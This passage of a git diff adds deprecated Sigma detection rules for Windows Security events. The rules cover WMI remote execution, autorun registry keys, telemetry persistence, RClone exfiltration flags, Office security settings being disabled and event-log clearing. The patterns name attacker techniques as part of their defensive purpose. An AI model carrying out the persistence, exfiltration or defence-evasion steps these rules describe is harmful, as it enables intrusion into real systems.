2019/10/23 +modified: 2023/02/28 +tags: + - attack.privilege_escalation + - attack.discovery + - attack.t1033 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_user: + SubjectUserName|contains: # covers many language settings + - AUTHORI + - AUTORI + selection_img: + - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + condition: process_creation and (all of selection*) +falsepositives: + - Possible name overlap with NT AUHTORITY substring to cover all languages +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml new file mode 100644 index 000000000..1ea5ae2e7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml @@ -0,0 +1,29 @@ +title: Winword.exe Loads Suspicious DLL +id: 2621b3a6-3840-4810-ac14-a02426086171 +status: deprecated +description: Detects Winword.exe loading a custom DLL using the /l flag +author: Victor Sergeev, oscd.community +references: + - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ +date: 2020/10/09 +modified: 2022/07/25 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: /l + NewProcessName|endswith: \winword.exe + condition: process_creation and selection +fields: + - CommandLine +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion + - attack.t1202 +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml new file mode 100644 index 000000000..9ce7b16a3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml @@ -0,0 +1,41 @@ +title: WMI Execution Via Office Process +id: 518643ba-7d9c-4fa5-9f37-baed36059f6a +related: + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: similar +status: deprecated +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule) +date: 2021/08/23 +modified: 2023/02/04 +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defense_evasion +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe + selection_parent: + ParentProcessName|endswith: + - \winword.exe + - \excel.exe + - \powerpnt.exe + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml new file mode 100644 index 000000000..9ef16d68a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml @@ -0,0 +1,34 @@ +title: WMI Remote Command Execution +id: e42af9df-d90b-4306-b7fb-05c863847ebd +status: deprecated +description: An adversary might use WMI to execute commands on a remote system +references: + - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic +author: frack113 +date: 2022/03/13 +modified: 2023/02/14 +tags: + - attack.execution + - attack.t1047 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + selection_cli: + CommandLine|contains|all: + - '/node:' + - process + - call + - create + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml new file mode 100644 index 000000000..a4b6c7189 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml @@ -0,0 +1,36 @@ +title: WMI Reconnaissance List Remote Services +id: 09af397b-c5eb-4811-b2bb-08b3de464ebf +status: deprecated +description: | + An adversary might use WMI to check if a certain Remote Service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic +author: frack113 +date: 2022/01/01 +modified: 2023/02/14 +tags: + - attack.execution + - attack.t1047 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + selection_cli: + CommandLine|contains|all: + - '/node:' + - service + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml new file mode 100644 index 000000000..7a4d54c9a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml @@ -0,0 +1,38 @@ +title: Windows Update Client LOLBIN +id: d7825193-b70a-48a4-b992-8b5b3015cc11 +status: deprecated +description: Detects code execution via the Windows Update client (wuauclt) +references: + - https://dtm.uk/wuauclt/ +author: FPT.EagleEye Team +date: 2020/10/17 +modified: 2023/11/11 +tags: + - attack.command_and_control + - attack.execution + - attack.t1105 + - attack.t1218 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe + selection_cli: + CommandLine|contains|all: + - /UpdateDeploymentProvider + - /RunHandlerComServer + - .dll + filter: + CommandLine|contains: + - ' /ClassId ' + - ' wuaueng.dll ' + condition: process_creation and (all of selection* and not filter) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml b/tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml new file mode 100644 index 000000000..f8cdc01f9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml @@ -0,0 +1,26 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: fde7929d-8beb-4a4c-b922-be9974671667 +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: Ensar Şamil, @sblmsrsn, OSCD Community +date: 2020/10/05 +modified: 2022/04/11 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: \SyncAppvPublishingServer.exe + condition: process_creation and selection +falsepositives: + - App-V clients +level: medium +status: deprecated +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml new file mode 100644 index 000000000..85fd9ba57 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml @@ -0,0 +1,28 @@ +title: Sysinternals SDelete Registry Keys +id: 9841b233-8df8-4ad7-9133-b0b4402a9014 +status: deprecated +description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. +references: + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +date: 2020/05/02 +modified: 2023/02/07 +tags: + - attack.defense_evasion + - attack.t1070.004 +logsource: + product: windows + category: registry_add +detection: + registry_add: + EventID: 4657 + Channel: Security + selection: + OperationType: '%%1904' + ObjectName|contains: \Software\Sysinternals\SDelete + condition: registry_add and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml new file mode 100644 index 000000000..4469a5721 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml @@ -0,0 +1,208 @@ +title: Autorun Keys Modification +id: 17f878b8-9968-4578-b814-c4217fc5768c +description: Detects modification of autostart extensibility point (ASEP) in registry. +status: deprecated +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md + - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +date: 2019/10/25 +modified: 2022/05/14 +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton +logsource: + category: registry_event + product: windows +level: medium +detection: + registry_event: + EventID: 4657 + Channel: Security + main_selection: + ObjectName|contains: + - \SOFTWARE\Wow6432Node\Microsoft\Windows CE Services\AutoStart + - \Software\Wow6432Node\Microsoft\Command Processor\Autorun + - \SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components + - \SOFTWARE\Microsoft\Windows CE Services\AutoStartOnDisconnect + - \SOFTWARE\Microsoft\Windows CE Services\AutoStartOnConnect + - \SYSTEM\Setup\CmdLine + - \Software\Microsoft\Ctf\LangBarAddin + - \Software\Microsoft\Command Processor\Autorun + - \SOFTWARE\Microsoft\Active Setup\Installed Components + - \SOFTWARE\Classes\Protocols\Handler + - \SOFTWARE\Classes\Protocols\Filter + - \SOFTWARE\Classes\Htmlfile\Shell\Open\Command\(Default) + - \Environment\UserInitMprLogonScript + - \SOFTWARE\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe + - \Software\Microsoft\Internet Explorer\UrlSearchHooks + - \SOFTWARE\Microsoft\Internet Explorer\Desktop\Components + - \Software\Classes\Clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\Inprocserver32 + - \Control Panel\Desktop\Scrnsave.exe + session_manager_base: + ObjectName|contains: \System\CurrentControlSet\Control\Session Manager + session_manager: + ObjectName|contains: + - \SetupExecute + - \S0InitialCommand + - \KnownDlls + - \Execute + - \BootExecute + - \AppCertDlls + current_version_base: + ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion + current_version: + ObjectName|contains: + - \ShellServiceObjectDelayLoad + - \Run + - \Policies\System\Shell + - \Policies\Explorer\Run + - \Group Policy\Scripts\Startup + - \Group Policy\Scripts\Shutdown + - \Group Policy\Scripts\Logon + - \Group Policy\Scripts\Logoff + - \Explorer\ShellServiceObjects + - \Explorer\ShellIconOverlayIdentifiers + - \Explorer\ShellExecuteHooks + - \Explorer\SharedTaskScheduler + - \Explorer\Browser Helper Objects + - \Authentication\PLAP Providers + - \Authentication\Credential Providers + - \Authentication\Credential Provider Filters + nt_current_version_base: + ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion + nt_current_version: + ObjectName|contains: + - \Winlogon\VmApplet + - \Winlogon\Userinit + - \Winlogon\Taskman + - \Winlogon\Shell + - \Winlogon\GpExtensions + - \Winlogon\AppSetup + - \Winlogon\AlternateShells\AvailableShells + - \Windows\IconServiceLib + - \Windows\Appinit_Dlls + - \Image File Execution Options + - \Font Drivers + - \Drivers32 + - \Windows\Run + - \Windows\Load + wow_current_version_base: + ObjectName|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion + wow_current_version: + ObjectName|contains: + - \ShellServiceObjectDelayLoad + - \Run + - \Explorer\ShellServiceObjects + - \Explorer\ShellIconOverlayIdentifiers + - \Explorer\ShellExecuteHooks + - \Explorer\SharedTaskScheduler + - \Explorer\Browser Helper Objects + wow_nt_current_version_base: + ObjectName|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion + wow_nt_current_version: + ObjectName|contains: + - \Windows\Appinit_Dlls + - \Image File Execution Options + - \Drivers32 + wow_office: + ObjectName|contains: \Software\Wow6432Node\Microsoft\Office + office: + ObjectName|contains: \Software\Microsoft\Office + wow_office_details: + ObjectName|contains: + - \Word\Addins + - \PowerPoint\Addins + - \Outlook\Addins + - \Onenote\Addins + - \Excel\Addins + - \Access\Addins + - test\Special\Perf + wow_ie: + ObjectName|contains: \Software\Wow6432Node\Microsoft\Internet Explorer + ie: + ObjectName|contains: \Software\Microsoft\Internet Explorer + wow_ie_details: + ObjectName|contains: + - \Toolbar + - \Extensions + - \Explorer Bars + wow_classes_base: + ObjectName|contains: \Software\Wow6432Node\Classes + wow_classes: + ObjectName|contains: + - \Folder\ShellEx\ExtShellFolderViews + - \Folder\ShellEx\DragDropHandlers + - \Folder\ShellEx\ColumnHandlers + - \Directory\Shellex\DragDropHandlers + - \Directory\Shellex\CopyHookHandlers + - \CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance + - \CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance + - \CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance + - \CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance + - \AllFileSystemObjects\ShellEx\DragDropHandlers + - \ShellEx\PropertySheetHandlers + - \ShellEx\ContextMenuHandlers + classes_base: + ObjectName|contains: \Software\Classes + classes: + ObjectName|contains: + - \Folder\ShellEx\ExtShellFolderViews + - \Folder\ShellEx\DragDropHandlers + - \Folder\Shellex\ColumnHandlers + - \Filter + - \Exefile\Shell\Open\Command\(Default) + - \Directory\Shellex\DragDropHandlers + - \Directory\Shellex\CopyHookHandlers + - \CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance + - \CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance + - \CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance + - \CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance + - \Classes\AllFileSystemObjects\ShellEx\DragDropHandlers + - \.exe + - \.cmd + - \ShellEx\PropertySheetHandlers + - \ShellEx\ContextMenuHandlers + scripts_base: + ObjectName|contains: \Software\Policies\Microsoft\Windows\System\Scripts + scripts: + ObjectName|contains: + - \Startup + - \Shutdown + - \Logon + - \Logoff + winsock_parameters_base: + ObjectName|contains: \System\CurrentControlSet\Services\WinSock2\Parameters + winsock_parameters: + ObjectName|contains: + - \Protocol_Catalog9\Catalog_Entries + - \NameSpace_Catalog5\Catalog_Entries + system_control_base: + ObjectName|contains: \SYSTEM\CurrentControlSet\Control + system_control: + ObjectName|contains: + - \Terminal Server\WinStations\RDP-Tcp\InitialProgram + - \Terminal Server\Wds\rdpwd\StartupPrograms + - \SecurityProviders\SecurityProviders + - \SafeBoot\AlternateShell + - \Print\Providers + - \Print\Monitors + - \NetworkProvider\Order + - \Lsa\Notification Packages + - \Lsa\Authentication Packages + - \BootVerificationProgram\ImagePath + filter: + - NewValue: (Empty) + - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount + - ProcessName: C:\WINDOWS\System32\svchost.exe + condition: registry_event and (( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter) +fields: + - SecurityID + - ObjectName + - OldValueType + - NewValueType +falsepositives: + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason + - Legitimate administrator sets up autorun keys for legitimate reason +tags: + - attack.persistence + - attack.t1547.001 +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml new file mode 100644 index 000000000..67a5cd103 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml @@ -0,0 +1,50 @@ +title: Abusing Windows Telemetry For Persistence - Registry +id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 +status: deprecated +description: | + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. +references: + - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ +author: Sreeman +date: 2020/09/29 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1112 + - attack.t1053 +logsource: + product: windows + category: registry_set +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\ + NewValue|endswith: + - .sh + - .exe + - .dll + - .bin + - .bat + - .cmd + - .js + - .ps + - .vb + - .jar + - .hta + - .msi + - .vbs + condition: registry_set and selection +fields: + - ObjectName + - NewValue + - EventID + - CommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml new file mode 100644 index 000000000..1d17dbb89 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml @@ -0,0 +1,28 @@ +title: User Account Hidden By Registry +id: 8a58209c-7ae6-4027-afb0-307a78e4589a +status: deprecated +description: Detect modification for a specific user to prevent that user from being listed on the logon screen +references: + - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md +author: frack113 +date: 2022/08/20 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1564.002 +logsource: + product: windows + category: registry_set +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\ + ObjectName|endswith: $ + NewValue: DWORD (0x00000000) + condition: registry_set and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml new file mode 100644 index 000000000..5092d1a09 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml @@ -0,0 +1,40 @@ +title: Disable Microsoft Office Security Features +id: 7c637634-c95d-4bbf-b26c-a82510874b34 +status: deprecated +description: Disable Microsoft Office Security Features by registry +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md + - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ + - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/ +author: frack113 +date: 2021/06/08 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: windows + category: registry_set + definition: key must be add to the sysmon configuration to works + # Sysmon + # \VBAWarnings + # \DisableInternetFilesInPV + # \DisableUnsafeLocationsInPV + # \DisableAttachementsInPV +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains: \SOFTWARE\Microsoft\Office\ + ObjectName|endswith: + - VBAWarnings + - DisableInternetFilesInPV + - DisableUnsafeLocationsInPV + - DisableAttachementsInPV + NewValue: DWORD (0x00000001) + condition: registry_set and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml new file mode 100644 index 000000000..10c849c8c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml @@ -0,0 +1,31 @@ +title: Office Security Settings Changed +id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd +status: deprecated +description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) +references: + - https://twitter.com/inversecos/status/1494174785621819397 + - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ + - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ +author: Trent Liffick (@tliffick) +date: 2020/05/22 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1112 +logsource: + category: registry_set + product: windows +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|endswith: + - \Security\Trusted Documents\TrustRecords + - \Security\AccessVBOM + - \Security\VBAWarnings + condition: registry_set and selection +falsepositives: + - Valid Macros and/or internal documents +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml new file mode 100644 index 000000000..3bd64f404 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml @@ -0,0 +1,28 @@ +title: SilentProcessExit Monitor Registration +id: c81fe886-cac0-4913-a511-2822d72ff505 +status: deprecated +description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process +references: + - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ +author: Florian Roth (Nextron Systems) +date: 2021/02/26 +modified: 2023/08/17 +tags: + - attack.persistence + - attack.t1546.012 +logsource: + category: registry_set + product: windows +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains: Microsoft\Windows NT\CurrentVersion\SilentProcessExit + NewValue|contains: MonitorProcess + condition: registry_set and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml new file mode 100644 index 000000000..154a30bb2 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml @@ -0,0 +1,50 @@ +title: RClone Execution +id: a0d63692-a531-4912-ad39-4393325b2a9c +status: deprecated +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +tags: + - attack.exfiltration + - attack.t1567.002 +author: Bhabesh Raj, Sittikorn S +date: 2021/05/10 +modified: 2022/04/11 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware + - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a + - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone + - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate RClone use +level: high +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + Description: Rsync for cloud storage + selection2: + CommandLine|contains|all: + - '--config ' + - '--no-check-certificate ' + - ' copy ' + selection3: + CommandLine|contains: + - mega + - pcloud + - ftp + - --progress + - --ignore-existing + - --auto-confirm + - --transfers + - --multi-thread-streams + NewProcessName|endswith: + - \rclone.exe + condition: process_creation and (1 of selection*) +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml new file mode 100644 index 000000000..475ab593b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml @@ -0,0 +1,31 @@ +title: Windows Defender Threat Detection Disabled +id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 +status: deprecated +description: Detects disabling Windows Defender threat protection +references: + - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md +author: Ján Trenčanský, frack113 +date: 2020/07/28 +modified: 2023/11/22 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: windows + service: windefend +detection: + windefend: + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + EventID: + - 5001 # Real-time protection is disabled. + - 5010 # Scanning for malware and other potentially unwanted software is disabled. + - 5012 # Scanning for viruses is disabled. + - 5101 # The antimalware platform is expired. + condition: windefend and selection +falsepositives: + - Administrator actions (should be investigated) + - Seen being triggered occasionally during Windows 8 Defender Updates +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml new file mode 100644 index 000000000..7d51fcd47 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml @@ -0,0 +1,31 @@ +title: Domain Trust Discovery +id: 77815820-246c-47b8-9741-e0def3f57308 +status: deprecated +description: Detects a discovery of domain trusts. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md +author: Jakob Weinzettl, oscd.community +date: 2019/10/23 +modified: 2023/02/04 +tags: + - attack.discovery + - attack.t1482 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - -filter + - trustedDomain + NewProcessName|endswith: \dsquery.exe + - CommandLine|contains: domain_trusts + NewProcessName|endswith: \nltest.exe + condition: process_creation and selection +falsepositives: + - Administration of systems. +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml new file mode 100644 index 000000000..3ac136c3b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml @@ -0,0 +1,31 @@ +title: Lateral Movement Indicator ConDrv +id: 29d31aee-30f4-4006-85a9-a4a02d65306c +status: deprecated #Too many FP +description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context. +author: Janantha Marasinghe +date: 2021/04/27 +modified: 2022/05/14 +references: + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm + - https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html +tags: + - attack.lateral_movement + - attack.execution + - attack.t1021 + - attack.t1059 +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection: + EventID: 4674 + ObjectServer: Security + ObjectType: File + ObjectName: \Device\ConDrv + condition: security and selection +falsepositives: + - Legal admin action +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml new file mode 100644 index 000000000..dbe8628c2 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml @@ -0,0 +1,30 @@ +title: Security Event Log Cleared +id: a122ac13-daf8-4175-83a2-72c387be339d +status: deprecated +description: Checks for event id 1102 which indicates the security event log was cleared. +references: + - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml +author: Saw Winn Naung +date: 2021/08/15 +modified: 2023/12/06 +tags: + - attack.t1070.001 +logsource: + service: security + product: windows +detection: + security: + Channel: Security + selection: + EventID: 1102 + Provider_Name: Microsoft-Windows-Eventlog + condition: security and selection +falsepositives: + - Legitimate administrative activity +fields: + - SubjectLogonId + - SubjectUserName + - SubjectUserSid + - SubjectDomainName +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml new file mode 100644 index 000000000..8e3be50b5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml @@ -0,0 +1,69 @@ +title: Group Modification Logging +id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e +status: 